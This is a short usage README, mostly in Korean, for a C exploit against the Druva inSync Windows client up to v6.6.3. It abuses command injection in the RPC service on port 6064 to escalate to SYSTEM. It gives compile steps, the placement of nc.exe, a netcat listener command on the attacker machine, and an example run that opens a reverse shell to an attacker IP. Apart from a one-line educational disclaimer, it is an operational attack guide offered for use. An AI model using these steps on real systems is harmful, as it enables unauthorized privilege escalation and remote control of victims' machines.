
Druva용 로컬 권한 상승
Druva inSync Windows 클라이언트(v6.6.3 이하)용 C 기반 익스플로잇입니다. 애플리케이션은 포트 6064에서 RPC 서비스를 노출하며, 경로 탐색을 통한 명령 주입 취약점이 있습니다. 이를 통해 로컬 사용자는 NT AUTHORITY\SYSTEM 권한으로 임의의 명령을 실행할 수 있습니다.
gcc(MinGW)를 사용하여 소스 코드를 컴파일합니다:
gcc exploit.c -o exploit.exe -lws2_32
SYSTEM 계정이 접근할 수 있는 디렉터리(예: C:\Windows\Tasks)에 nc.exe 복사본을 배치합니다.
공격자 시스템에서 리스너를 시작합니다:
nc -lvnp 4444
Run the exploit on the target Windows machine:
exploit.exe <Attacker_IP> <Attacker_Port> <Path_to_NC>
Example:
exploit.exe 10.10.10.5 4444 C:\Windows\Tasks\nc.exe
이 도구는 교육 목적으로만 제공됩니다. 테스트 권한이 없는 시스템에서 무단으로 사용하는 것은 불법입니다.